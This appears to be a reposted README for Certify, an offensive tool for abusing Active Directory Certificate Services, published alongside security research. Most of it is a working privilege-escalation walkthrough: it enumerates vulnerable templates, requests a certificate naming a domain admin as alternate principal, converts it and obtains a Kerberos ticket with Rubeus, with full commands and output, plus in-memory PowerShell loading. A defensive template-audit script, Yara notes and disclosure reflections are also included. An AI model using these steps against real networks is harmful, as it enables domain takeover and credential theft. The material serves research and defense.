Certify: Active Directory Certificate Abuse


by Helen Lafayette, October 1, 2021, 11:30 am


Certify is a C# tool to enumerate and abuse misconfigurations in Active Directory Certificate Services (AD CS).

@harmj0y and @tifkin_ are the primary authors of Certify and the associated AD CS research (blog post and whitepaper).

Usage

C:\Tools>Certify.exe

   v1.0.0

  Find information about all registered CAs:
    Certify.exe cas [/ca:SERVER\ca-name | /domain:domain.local | /path:CN=Configuration,DC=domain,DC=local] [/hideAdmins] [/showAllPermissions] [/skipWebServiceChecks] [/quiet]

  Find all enabled certificate templates:
    Certify.exe find [/ca:SERVER\ca-name | /domain:domain.local | /path:CN=Configuration,DC=domain,DC=local] [/quiet]

  Find vulnerable/abusable certificate templates using default low-privileged groups:
    Certify.exe find /vulnerable [/ca:SERVER\ca-name | /domain:domain.local | /path:CN=Configuration,DC=domain,DC=local] [/quiet]

  Find vulnerable/abusable certificate templates using all groups the current user context is a part of:
    Certify.exe find /vulnerable /currentuser [/ca:SERVER\ca-name | /domain:domain.local | /path:CN=Configuration,DC=domain,DC=local] [/quiet]

  Find enabled certificate templates where ENROLLEE_SUPPLIES_SUBJECT is enabled:
    Certify.exe find /enrolleeSuppliesSubject [/ca:SERVER\ca-name | /domain:domain.local | /path:CN=Configuration,DC=domain,DC=local] [/quiet]

  Find enabled certificate templates capable of client authentication:
    Certify.exe find /clientauth [/ca:SERVER\ca-name | /domain:domain.local | /path:CN=Configuration,DC=domain,DC=local] [/quiet]

  Find all enabled certificate templates, display all of their permissions, and don't display the banner message:
    Certify.exe find /showAllPermissions /quiet [/ca:COMPUTER\CA_NAME | /domain:domain.local | /path:CN=Configuration,DC=domain,DC=local]

  Find all enabled certificate templates and output to a json file:
    Certify.exe find /json /outfile:C:\Temp\out.json [/ca:COMPUTER\CA_NAME | /domain:domain.local | /path:CN=Configuration,DC=domain,DC=local]

  Enumerate access control information for PKI objects:
    Certify.exe pkiobjects [/domain:domain.local] [/showAdmins] [/quiet]

  Request a new certificate using the current user context:
    Certify.exe request /ca:SERVER\ca-name [/subject:X] [/template:Y] [/install]

  Request a new certificate using the current machine context:
    Certify.exe request /ca:SERVER\ca-name /machine [/subject:X] [/template:Y] [/install]

  Request a new certificate using the current user context but for an alternate name (if supported):
    Certify.exe request /ca:SERVER\ca-name /template:Y /altname:USER

  Request a new certificate on behalf of another user, using an enrollment agent certificate:
    Certify.exe request /ca:SERVER\ca-name /template:Y /onbehalfof:DOMAIN\USER /enrollcert:C:\Temp\enroll.pfx [/enrollcertpw:CERT_PASSWORD]

  Download an already requested certificate:
    Certify.exe download /ca:SERVER\ca-name /id:X [/install] [/machine]

Certify completed in 00:00:00.0200190


Using Requested Certificates

Certificates can be converted to .pfx files (the format used in the Rubeus step below) with:

openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx

Certificates can then be used with Rubeus to request a TGT with:


Rubeus.exe asktgt /user:X /certificate:C:\Temp\cert.pfx /password:<CERT_PASSWORD>

Tutorial

First, use Certify.exe to see if there are any vulnerable templates:

C:\Temp>Certify.exe find /vulnerable

   v1.0.0

[*] Action: Find certificate templates
[*] Using the search base 'CN=Configuration,DC=theshire,DC=local'
[*] Restricting to CA name : dc.theshire.local\theshire-DC-CA

[*] Listing info about the Enterprise CA 'theshire-DC-CA'

    Enterprise CA Name            : theshire-DC-CA
    DNS Hostname                  : dc.theshire.local
    FullName                      : dc.theshire.local\theshire-DC-CA
    Flags                         : SUPPORTS_NT_AUTHENTICATION, CA_SERVERTYPE_ADVANCED
    Cert SubjectName              : CN=theshire-DC-CA, DC=theshire, DC=local
    Cert Thumbprint               : 187D81530E1ADBB6B8B9B961EAADC1F597E6D6A2
    Cert Serial                   : 14BFC25F2B6EEDA94404D5A5B0F33E21
    Cert Start Date               : 1/4/2021 10:48:02 AM
    Cert End Date                 : 1/4/2026 10:58:02 AM
    Cert Chain                    : CN=theshire-DC-CA,DC=theshire,DC=local
    UserSpecifiedSAN              : Disabled
    CA Permissions                :
      Owner: BUILTIN\Administrators        S-1-5-32-544

      Access Rights                                     Principal
      Allow  ManageCA, ManageCertificates               BUILTIN\Administrators        S-1-5-32-544
      Allow  ManageCA, ManageCertificates               THESHIRE\Domain Admins        S-1-5-21-937929760-3187473010-80948926-512
      Allow  ManageCA, Read, Enroll                     THESHIRE\Domain Users         S-1-5-21-937929760-3187473010-80948926-513
        [!] Low-privileged principal has ManageCA rights!
      Allow  Enroll                                     THESHIRE\Domain Computers     S-1-5-21-937929760-3187473010-80948926-515
      Allow  ManageCA, ManageCertificates               THESHIRE\Enterprise Admins    S-1-5-21-937929760-3187473010-80948926-519
      Allow  ManageCertificates, Enroll                 THESHIRE\certmanager          S-1-5-21-937929760-3187473010-80948926-1605
      Allow  ManageCA, Enroll                           THESHIRE\certadmin            S-1-5-21-937929760-3187473010-80948926-1606
    Enrollment Agent Restrictions :
      Everyone                      S-1-1-0
        Template : <All>
        Targets  :
          Everyone                      S-1-1-0

      Everyone                      S-1-1-0
        Template : User
        Targets  :
          Everyone                      S-1-1-0

Vulnerable Certificates Templates :

    CA Name                               : dc.theshire.local\theshire-DC-CA
    Template Name                         : User2
    Validity Period                       : 2 years
    Renewal Period                        : 6 weeks
    msPKI-Certificates-Name-Flag          : SUBJECT_ALT_REQUIRE_UPN, SUBJECT_REQUIRE_DIRECTORY_PATH
    mspki-enrollment-flag                 : INCLUDE_SYMMETRIC_ALGORITHMS, PEND_ALL_REQUESTS, PUBLISH_TO_DS, AUTO_ENROLLMENT
    Authorized Signatures Required        : 0
    pkiextendedkeyusage                   : Client Authentication, Smart Card Logon
    Permissions
      Enrollment Permissions
        Enrollment Rights           : THESHIRE\Domain Admins        S-1-5-21-937929760-3187473010-80948926-512
                                      THESHIRE\Enterprise Admins    S-1-5-21-937929760-3187473010-80948926-519
        All Extended Rights         : THESHIRE\Domain Users         S-1-5-21-937929760-3187473010-80948926-513
      Object Control Permissions
        Owner                       : THESHIRE\localadmin           S-1-5-21-937929760-3187473010-80948926-1000
        Full Control Principals     : THESHIRE\Domain Users         S-1-5-21-937929760-3187473010-80948926-513
        WriteOwner Principals       : NT AUTHORITY\Authenticated Users  S-1-5-11
                                      THESHIRE\Domain Admins        S-1-5-21-937929760-3187473010-80948926-512
                                      THESHIRE\Domain Users         S-1-5-21-937929760-3187473010-80948926-513
                                      THESHIRE\Enterprise Admins    S-1-5-21-937929760-3187473010-80948926-519
        WriteDacl Principals        : NT AUTHORITY\Authenticated Users  S-1-5-11
                                      THESHIRE\Domain Admins        S-1-5-21-937929760-3187473010-80948926-512
                                      THESHIRE\Domain Users         S-1-5-21-937929760-3187473010-80948926-513
                                      THESHIRE\Enterprise Admins    S-1-5-21-937929760-3187473010-80948926-519
        WriteProperty Principals    : NT AUTHORITY\Authenticated Users  S-1-5-11
                                      THESHIRE\Domain Admins        S-1-5-21-937929760-3187473010-80948926-512
                                      THESHIRE\Domain Users         S-1-5-21-937929760-3187473010-80948926-513
                                      THESHIRE\Enterprise Admins    S-1-5-21-937929760-3187473010-80948926-519

    CA Name                               : dc.theshire.local\theshire-DC-CA
    Template Name                         : VulnTemplate
    Validity Period                       : 3 years
    Renewal Period                        : 6 weeks
    msPKI-Certificates-Name-Flag          : ENROLLEE_SUPPLIES_SUBJECT
    mspki-enrollment-flag                 : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS
    Authorized Signatures Required        : 0
    pkiextendedkeyusage                   : Client Authentication, Encrypting File System, Secure Email
    Permissions
      Enrollment Permissions
        Enrollment Rights           : THESHIRE\Domain Admins        S-1-5-21-937929760-3187473010-80948926-512
                                      THESHIRE\Domain Users         S-1-5-21-937929760-3187473010-80948926-513
                                      THESHIRE\Enterprise Admins    S-1-5-21-937929760-3187473010-80948926-519
      Object Control Permissions
        Owner                       : THESHIRE\localadmin           S-1-5-21-937929760-3187473010-80948926-1000
        WriteOwner Principals       : THESHIRE\Domain Admins        S-1-5-21-937929760-3187473010-80948926-512
                                      THESHIRE\Enterprise Admins    S-1-5-21-937929760-3187473010-80948926-519
                                      THESHIRE\localadmin           S-1-5-21-937929760-3187473010-80948926-1000
        WriteDacl Principals        : THESHIRE\Domain Admins        S-1-5-21-937929760-3187473010-80948926-512
                                      THESHIRE\Enterprise Admins    S-1-5-21-937929760-3187473010-80948926-519
                                      THESHIRE\localadmin           S-1-5-21-937929760-3187473010-80948926-1000
        WriteProperty Principals    : THESHIRE\Domain Admins        S-1-5-21-937929760-3187473010-80948926-512
                                      THESHIRE\Enterprise Admins    S-1-5-21-937929760-3187473010-80948926-519
                                      THESHIRE\localadmin           S-1-5-21-937929760-3187473010-80948926-1000

Certify completed in 00:00:00.6548319


Given the output above, we have the following three issues:

  1. THESHIRE\Domain Users have ManageCA permissions over the dc.theshire.local\theshire-DC-CA CA (ESC7). This means anyone in that group can flip the EDITF_ATTRIBUTESUBJECTALTNAME2 flag on the CA.
  2. THESHIRE\Domain Users have full control over the User2 template (ESC4). This means anyone in that group can set the CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT flag on the template and remove the PEND_ALL_REQUESTS issuance requirement.
  3. THESHIRE\Domain Users can enroll in the VulnTemplate template, which can be used for client authentication and has ENROLLEE_SUPPLIES_SUBJECT set (ESC1). This means anyone in that group can enroll in this template and specify an arbitrary subject alternative name (e.g. a DA).
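The three findings above reduce to a small number of template attributes. As an added example (not Certify's own code), the following audit encodes the ESC1 and ESC4 conditions on those attributes and runs them over constructed copies of the User2 and VulnTemplate entries from the output above; the flag bit values come from MS-CRTD, and the principals are reduced to their names rather than the SIDs shown.

```python
"""Audit AD CS certificate-template attributes for ESC1 and ESC4 conditions.
Added example, not part of Certify. Sample data is a constructed copy of the
User2 / VulnTemplate output above, with principals reduced to names."""

from dataclasses import dataclass

# msPKI-Certificate-Name-Flag bits (MS-CRTD 2.26)
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x00000001
CT_FLAG_SUBJECT_ALT_REQUIRE_UPN = 0x02000000
CT_FLAG_SUBJECT_REQUIRE_DIRECTORY_PATH = 0x80000000

# msPKI-Enrollment-Flag bits (MS-CRTD 2.27)
CT_FLAG_INCLUDE_SYMMETRIC_ALGORITHMS = 0x00000001
CT_FLAG_PEND_ALL_REQUESTS = 0x00000002   # "manager approval" issuance requirement
CT_FLAG_PUBLISH_TO_DS = 0x00000008
CT_FLAG_AUTO_ENROLLMENT = 0x00000020

# pKIExtendedKeyUsage OIDs that let a certificate authenticate a principal
CLIENT_AUTH_EKUS = {
    "1.3.6.1.5.5.7.3.2",       # Client Authentication
    "1.3.6.1.4.1.311.20.2.2",  # Smart Card Logon
    "1.3.6.1.5.2.3.4",         # PKINIT Client Authentication
    "2.5.29.37.0",             # Any Purpose
}

# Principals Certify treats as low-privileged by default
LOW_PRIV = {"Domain Users", "Domain Computers", "Authenticated Users", "Everyone"}


@dataclass
class Template:
    name: str
    name_flag: int          # msPKI-Certificate-Name-Flag
    enrollment_flag: int    # msPKI-Enrollment-Flag
    ra_signatures: int      # msPKI-RA-Signature ("Authorized Signatures Required")
    ekus: frozenset         # pKIExtendedKeyUsage OIDs; empty means no EKU restriction
    enroll: frozenset       # principals holding Enroll or All Extended Rights
    write_control: frozenset = frozenset()  # Full Control/WriteOwner/WriteDacl/WriteProperty


def allows_client_auth(t: Template) -> bool:
    # A template with no EKU at all issues any-purpose certificates.
    return not t.ekus or bool(t.ekus & CLIENT_AUTH_EKUS)


def audit_template(t: Template) -> list:
    """Return the ESC identifiers (from the findings above) that apply to t."""
    findings = []
    # ESC1: a low-privileged enrollee may supply the subject/SAN of a
    # client-authentication certificate with no approval and no co-signature.
    if (t.enroll & LOW_PRIV
            and allows_client_auth(t)
            and t.name_flag & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT
            and not t.enrollment_flag & CT_FLAG_PEND_ALL_REQUESTS
            and t.ra_signatures == 0):
        findings.append("ESC1")
    # ESC4: a low-privileged principal can rewrite the template object itself
    # (e.g. set ENROLLEE_SUPPLIES_SUBJECT or clear PEND_ALL_REQUESTS).
    if t.write_control & LOW_PRIV:
        findings.append("ESC4")
    return findings


# Constructed from the "find /vulnerable" output above
USER2 = Template(
    name="User2",
    name_flag=CT_FLAG_SUBJECT_ALT_REQUIRE_UPN | CT_FLAG_SUBJECT_REQUIRE_DIRECTORY_PATH,
    enrollment_flag=(CT_FLAG_INCLUDE_SYMMETRIC_ALGORITHMS | CT_FLAG_PEND_ALL_REQUESTS
                     | CT_FLAG_PUBLISH_TO_DS | CT_FLAG_AUTO_ENROLLMENT),
    ra_signatures=0,
    ekus=frozenset({"1.3.6.1.5.5.7.3.2", "1.3.6.1.4.1.311.20.2.2"}),
    enroll=frozenset({"Domain Admins", "Enterprise Admins", "Domain Users"}),
    write_control=frozenset({"Authenticated Users", "Domain Admins",
                             "Domain Users", "Enterprise Admins"}),
)

VULN_TEMPLATE = Template(
    name="VulnTemplate",
    name_flag=CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT,
    enrollment_flag=CT_FLAG_INCLUDE_SYMMETRIC_ALGORITHMS | CT_FLAG_PUBLISH_TO_DS,
    ra_signatures=0,
    # Client Authentication, Encrypting File System, Secure Email
    ekus=frozenset({"1.3.6.1.5.5.7.3.2", "1.3.6.1.4.1.311.10.3.4", "1.3.6.1.5.5.7.3.4"}),
    enroll=frozenset({"Domain Admins", "Domain Users", "Enterprise Admins"}),
    write_control=frozenset({"Domain Admins", "Enterprise Admins", "localadmin"}),
)

if __name__ == "__main__":
    for tmpl in (USER2, VULN_TEMPLATE):
        print(f"{tmpl.name}: {audit_template(tmpl) or 'no finding'}")
```

User2 is not an ESC1 hit only because PEND_ALL_REQUESTS is set and the enrollee cannot supply the subject; finding 2 is precisely that a low-privileged writer can change both bits, which is why it is reported as ESC4.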

We will demonstrate abuse of scenario 3.

Next, we request a new certificate for this template/CA, specifying the DA localadmin as the alternate principal:

C:\Temp>Certify.exe request /ca:dc.theshire.local\theshire-DC-CA /template:VulnTemplate /altname:localadmin

   v1.0.0

[*] Action: Request a Certificates

[*] Current user context    : THESHIRE\harmj0y
[*] No subject name specified, using current context as subject.

[*] Template                : VulnTemplate
[*] Subject                 : CN=harmj0y, OU=TestOU, DC=theshire, DC=local
[*] AltName                 : localadmin

[*] Certificate Authority   : dc.theshire.local\theshire-DC-CA

[*] CA Response             : The certificate had been issued.
[*] Request ID              : 337

[*] cert.pem         :

-----BEGIN RSA PRIVATE KEY-----
MIIEpAIBAAKCAQEAn8bKuwCYj8...
-----END RSA PRIVATE KEY-----
-----BEGIN CERTIFICATE-----
MIIGITCCBQmgAwIBAgITVQAAAV...
-----END CERTIFICATE-----

[*] Convert with: openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx

Certify completed in 00:00:04.2127911


Copy the -----BEGIN RSA PRIVATE KEY----- ... -----END CERTIFICATE----- section to a file on Linux/macOS and run the openssl command to convert it to a .pfx file. Don't enter a password when prompted:

(base) laptop:~ harmj0y$ openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
Enter Export Password:
Verifying - Enter Export Password:
(base) laptop:~ harmj0y$

Finally, move cert.pfx to the target machine's file system (manually or via Cobalt Strike) and request a TGT for the altname user with Rubeus:

C:\Temp>Rubeus.exe asktgt /user:localadmin /certificate:C:\Temp\cert.pfx

   v1.6.1

[*] Action: Ask TGT

[*] Using PKINIT with etype rc4_hmac and subject: CN=harmj0y, OU=TestOU, DC=theshire, DC=local
[*] Building AS-REQ (w/ PKINIT preauth) for: 'theshire.local\localadmin'
[+] TGT request successful!
[*] base64(ticket.kirbi):

      doIFujCCBbagAwIBBaEDAgEWooIExzCC...(snip)...

  ServiceName           :  krbtgt/theshire.local
  ServiceRealm          :  THESHIRE.LOCAL
  UserName              :  localadmin
  UserRealm             :  THESHIRE.LOCAL
  StartTime             :  2/22/2021 2:06:51 PM
  EndTime               :  2/22/2021 3:06:51 PM
  RenewTill             :  3/1/2021 2:06:51 PM
  Flags                 :  name_canonicalize, pre_authent, initial, renewable, forwardable
  KeyType               :  rc4_hmac
  Base64(key)           :  Etb5WPFWeMbsZr2+FQQQMw==


Defensive Considerations

Certify was released with our Black Hat 2021 talk "Certified Pre-Owned: Abusing Active Directory Certificate Services".

The TypeRefHash of the current Certify codebase is f9dbbfe2527e1164319350c0b0900c58be57a46c53ffef31699ed116a765995a.

The TypeLib GUID of Certify is 64524ca5-e4d0-41b3-acc3-3bdbefd40c97. This is reflected in the Yara rules currently included in this repository.

See our whitepaper for prevention and detection guidance.

Compile Instructions

We are not planning on releasing binaries for Certify, so you will have to compile it yourself :)

Certify was built against .NET 4.0 and is compatible with Visual Studio 2019 Community Edition. Simply open the project .sln file, choose "Release", and build.

Sidenote: Running Certify Through PowerShell

If you want to run Certify in memory through a PowerShell wrapper, first compile Certify and base64-encode the resulting assembly:

[Convert]::ToBase64String([IO.File]::ReadAllBytes("C:\Temp\Certify.exe")) | Out-File -Encoding ASCII C:\Temp\Certify.txt

Certify can then be loaded in a PowerShell script as follows (replacing "aa..." with the base64-encoded Certify assembly string):

$CertifyAssembly = [System.Reflection.Assembly]::Load([Convert]::FromBase64String("aa..."))

The Main() method and any arguments can then be invoked as follows:

[Certify.Program]::Main("find /vulnerable".Split())

Sidenote: Running Certify Through PSRemoting

Because of the way PSRemoting handles output, we need to redirect stdout to a string and return that instead. Luckily, Certify has a function to help with this.

If you follow the instructions in "Sidenote: Running Certify Through PowerShell" to create a Certify.ps1, append something like the following to the script:

[Certify.Program]::MainString("find /vulnerable")

You should then be able to run Certify through PSRemoting with something like the following:

$s = New-PSSession dc.theshire.local
Invoke-Command -Session $s -FilePath C:\Temp\Certify.ps1

Alternatively, Certify's /outfile:C:\FILE.txt argument redirects all output streams to the specified file.

Reflections

In terms of public disclosure, we self-embargoed the release of our offensive tooling (Certify and ForgeCert) for ~45 days after the publication of our whitepaper to give organizations a chance to get a handle on the issues surrounding Active Directory Certificate Services. We also pre-emptively published Yara rules/IOCs for both projects and released the defense-oriented PSPKIAudit PowerShell project alongside the whitepaper. However, we have found that in the past, organizations and vendors often do not fix issues or build detections for "theoretical" attacks until someone with a proof of concept demonstrates that something is possible.

Acknowledgments

Certify used several online resources as reference and inspiration:

The AD CS work built upon the work of several others. The whitepaper has complete coverage, but to summarize:
